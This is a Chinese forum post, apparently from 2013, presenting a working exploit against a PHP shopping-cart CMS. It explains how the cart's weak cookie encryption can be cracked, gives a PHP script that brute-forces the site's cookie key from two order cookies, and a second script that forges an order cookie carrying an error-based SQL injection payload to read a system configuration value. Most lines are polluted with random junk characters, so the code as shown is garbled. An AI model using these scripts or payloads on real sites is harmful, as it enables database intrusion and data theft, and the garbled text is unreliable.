www.xxx.com/plus/search.php?keyword=
% E y! Y5 ] \+ S1 f2 q8 [; L* k在 include/shopcar.class.php中
3 \6 D3 G1 J% ?2 P先看一下这个shopcar类是如何生成cookie的
- A; X! G; m0 `, L/ E9 J7 B239 function saveCookie($key,$value)/ M1 S) h- Q6 ]/ g
240 {; B+ B) D5 E: T# T% T
241 if(is_array($value))) G" E1 a: d$ G
242 {' w7 P, w- b$ p9 [
243 $value = $this->enCrypt($this->enCode($value));, a) m9 v' ~7 C& i" M% q& O+ P
244 }6 C/ i( s$ i" K
245 else' J! B6 e* z1 a
246 {
% ^ c$ B1 M0 e. |. B, I1 {; b4 t247 $value = $this->enCrypt($value);' Y9 S/ `3 \9 T+ h7 ?1 b/ X
248 }( D( w% R0 E. t D# l4 _' @
249 setcookie($key,$value,time()+36000,’/');: ? \ }2 t# S e, f) d. g8 L6 \
250 }
" R# c9 B* M1 g. k- E8 g简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数- T @4 d+ o4 p2 c0 ^
186 function enCrypt($txt)
# q" v+ A; {' x/ R! g4 U187 {! D- g1 g5 l5 Z, t
188 srand((double)microtime() * 1000000);
$ }" p5 U6 g I! U: [' L) b2 X1 B189 $encrypt_key = md5(rand(0, 32000)); E0 {! l8 Q0 b8 u0 }; r+ Z
190 $ctr = 0;8 d" |9 m- }! X, V e8 a
191 $tmp = ”;9 s) a7 X$ m4 I; d# ?$ l3 ?! S
192 for($i = 0; $i < strlen($txt); $i++)
' U1 X7 v% z% b$ ^! c193 {
, s, J0 W3 U2 Y# g5 a/ ~194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
|, [9 K% {. s4 a, L195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);. \8 f3 Z4 p% O
196 }
1 u9 R# Z* h- G197 return base64_encode($this->setKey($tmp));( e+ _* m9 [( G$ N8 c& V
198 }
9 ?- y5 ^, n! n213 function setKey($txt)% O, [( h, k5 V
214 {( }) ^. g0 P' t3 T5 b# L- k
215 global $cfg_cookie_encode;
5 E3 k+ S, W/ j) s216 $encrypt_key = md5(strtolower($cfg_cookie_encode));9 ^4 _3 @7 t" F
217 $ctr = 0;
, }4 b( | M, J, y9 x# g K218 $tmp = ”;
6 @, p8 }3 m' F' b0 E6 {219 for($i = 0; $i < strlen($txt); $i++)
( f. p Q5 c$ p" Y* b* a3 T! t220 {
- U0 I. i# i5 f! r9 \221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
+ s% I# U6 f! y* p222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
. N) K5 t0 L e2 b6 i223 } w3 }& v M! P8 i/ c
224 return $tmp;
1 } t8 X& ]! b$ Q, U, [ d225 }; B& [9 w! _6 k d
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的1 p- X, J. J+ ^0 V% q6 v6 e
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
8 S6 Y6 a4 g* Q( V- D' k- L具体代码如下:
; o3 O9 a$ C7 n( k8 v<?php/ N C5 g! p0 P% O
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
) F8 t6 y. V' p/ `$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
( _: F ?3 N" A2 I9 ?2 r$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 S- w g: v N: a+ y7 Z# i0 cfunction reStrCode($code,$string). m9 J. \3 X( Q+ C
{" P+ w- r5 ?: m7 m8 N
$code = base64_decode($code);
- j0 k! j+ _8 r \$key = “”;+ z' o1 O c$ ?/ l& d3 t) z/ K) ~
for($i=0 ; $i<32 ; $i++), G% ?6 y4 J! o4 b+ D' ]5 I* t) @
{
' u, U' I) }& M7 ]! v( k$key .= $string[$i] ^ $code[$i];6 R) f& r0 q$ M
}5 E+ p6 A" |/ H# G. g; \
return $key;
( y% o& R- K0 \) B}/ l. u3 ^+ r- ]7 h" `5 ]
function getKeys($cookie,$plantxt): b" G: g$ M9 T
{; O0 h" f$ ^$ r' R) y* B! L
$tmp = $cookie;) ?! [- X/ x( ]/ C. u# T
$results = array();; p: v+ j5 c$ p* t
for($j=0 ; $j < 32000; $j++)
* K0 g4 \. j% a T{+ c& K- |3 ?6 M+ u4 ^
$ c% n) \# c: d
$txt = $plantxt;
* Z$ |; n' V7 K$ j$ B/ t3 L$ctr = 0;
3 D) {' L- C, f6 P* i$tmp = ”;* c# F8 o$ `* H' N' ]8 K
$encrypt_key = md5($j);# a/ x# d! |- S4 b) o o
for($i =0; $i < strlen($txt); $i ++)
" I- M9 L3 F; \1 x5 h{( f4 x* X4 g* x6 S/ P9 M
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;7 W3 v3 _# D( i/ E+ X; Q# A3 }& J
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
6 k. J/ m8 Q: m" L}
# g6 u/ x$ K9 f9 R7 e$string = $tmp;: L3 v6 m' C9 K" S
$code = $cookie;
' R. z% v" g. l$result = reStrCode($code,$string);3 g i" B' m( j, }# A8 Z% {) O) z
if(eregi(‘^[a-z0-9]+$’,$result))
, I# B0 N$ w7 x5 r/ |. J& K3 |{
$ w4 V- q3 E" N7 {/ q+ T/ ]) L$ K$ qecho $result.”\n”;$ p4 U9 O; u6 h& v: J$ b1 p
$results[] = $result;
# e4 w7 P1 R1 l5 R2 d+ C2 t}
5 @' m* f. O0 l0 U' K}
8 p8 C) T5 i7 e" K$ ]8 {% w+ z8 Oreturn $results;$ g; B: ^/ d1 m- G& M- a B1 `
}3 J J) H0 l6 B; L9 b& n" H6 f
$results1 = getKeys($cookie1,$plantxt);0 J% l7 r3 T% t6 O
$results2 = getKeys($cookie2,$plantxt);
, _( s/ O" T. ~2 Qprint “\n——————–real key————————–\n”;* C. d5 ]$ x. K/ \- J9 \) h( V' h
foreach($results1 as $test1)
' X) D: P7 W. j$ L{
" t5 Z$ ?8 O; [! M$ i+ E" jforeach($results2 as $test2)
& z: y( h7 G% d8 @+ u: r1 \/ s$ X{5 |. ^/ `) A: [& B# g
if($test1 == $test2)2 j0 w& b6 H3 h7 I, F( R
{
7 c- D) e! ]: u6 s$ V/ f/ F( Becho $test1.”\n”;
/ Y3 c4 `) k4 h6 u9 P# J( H$ Z4 J}
6 M- V; n: Q* J' a" h}
+ |" T* l5 Z9 h) `$ I}
. e, H2 Z3 c$ @/ Z/ m& T! V' X?>7 s: ~ T1 U0 A6 D( V: G
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,! a) W1 V" A$ ~& s) {" q
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua11 h. r! @/ p; d+ }/ k
然后推算出md5(strtolower($cfg_cookie_encode))
( M- Q: N4 X5 G$ e( Z: q2 ?' e/ y* x得到这个key之后,我们就可以构造任意购物车的cookie
$ o! G3 J% I$ Y a4 V; f接着看* X& Y# q$ \+ ?, U- ~( ^& _ D
20 class MemberShops: W1 k9 @* ~) B: O8 H A& ~! p
21 {
: t& B5 H& [+ Q$ F8 H. p22 var $OrdersId;
* Z. e; c' U3 I( |23 var $productsId;
7 v6 L. I, I2 K. s4 q k' R24$ A5 Y/ {5 i! H# p* Y+ l
25 function __construct()
: A! e J% V( [2 P26 {
# N" ?$ i8 ?! m# u27 $this->OrdersId = $this->getCookie(“OrdersId”);6 A7 U8 K2 n W* i( m5 S( y
28 if(empty($this->OrdersId))
0 \+ l* V8 y8 U0 p29 {5 ?( q8 d2 T) L1 C) l8 b6 G9 z
30 $this->OrdersId = $this->MakeOrders();
/ d! P8 T/ P6 \; ~- n31 }
3 d4 e4 m# d' ]& r32 }
+ i7 ?1 }$ P9 L发现OrderId是从cookie里面获取的
- T O' o' M" r& O然后( l: Y$ _- O, A: b
/plus/carbuyaction.php中的) \2 W; P8 L K+ p( E# P7 N
29 $cart = new MemberShops();
: E) E& W1 A; } a) h6 F39 $OrdersId = $cart->OrdersId; //本次记录的订单号" O5 q% G8 I* `
……
! _1 O6 c3 O7 ^7 \& N0 L173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);8 h$ z2 _# r* P" p
接着我们就可以注入了
* K4 ~6 i, \- `通过利用下面代码生成cookie:
+ ~3 }3 I. v4 U* S6 M q- G<?php
8 N) q3 }/ M [0 g8 m! P$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
7 K7 \7 u( x9 x. H9 E! Y2 O F$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
; C) t# [! J. M$ j: @5 K. c* efunction setKey($txt)! p/ M7 m) J V* l4 U/ J; s
{" q) ^# @! p, c2 s, Q
global $encrypt_key;
0 d( F9 N z K! m' s y# h$ctr = 0;
8 C! l$ t8 C! @9 K$tmp = ”;" j' m# ]% }+ S* [5 T
for($i = 0; $i < strlen($txt); $i++)
) q# y3 r; O4 e) [6 h/ K8 m{* @: e4 w9 |9 g- t
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;9 H- a* I& `/ c& ]# q8 O# [" {
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
, h5 ~7 Y# j, }8 _}
& u7 N- B8 F$ t, r. E* {* g. Jreturn $tmp;
1 P+ h' n# _$ b}! ^2 v& K7 ]2 q5 i
function enCrypt($txt)
0 o4 s* n( C0 i{# f1 |0 B0 e0 U% Q6 E
srand((double)microtime() * 1000000);% g& z# S1 M9 e# {! [3 b( N- C% Y
$encrypt_key = md5(rand(0, 32000));
2 n: R. T- J8 |3 |# ~. r" C# ?$ctr = 0;
/ y' d; |* |3 n5 w1 X$tmp = ”;, k0 H) k Q. Q* k4 D$ ] L2 g( B: G
for($i = 0; $i < strlen($txt); $i++)
. P, I5 E1 ?" P+ A{
P4 A7 T! o: f% J8 E7 \$ |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
" s# h. \+ Y( \$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
0 @2 ?$ s2 A V' O0 Q$ Q) O}
P8 s6 A* L& V9 b( Greturn base64_encode(setKey($tmp));' F# j# N0 k2 q6 T
}
; S0 t- _- x4 ?* {* ]8 ^for($dest =0;$dest = enCrypt($txt);)( c; [5 I; y' s
{
2 D" e; F" t! Q' }if(!strpos($dest,’+'))
" o& _8 K" q' _{
8 L1 H# G8 I" j( F" @; J6 Q0 q" kbreak;
+ c' ^1 ^4 _+ ` T" o& Q}
2 h: L1 ?' R& x5 i3 M. ~, s4 K0 B}
% n' V6 H+ a( y; G2 Q7 D0 fecho $dest.”\n”;
* _- J6 h1 l9 K+ \' \ D?>
& Z( {$ W9 j2 q+ K
' e6 Y( \$ k! G: P4 t/ H8 m |
发表于 2013-2-13 23:58:29
收藏
支持
反对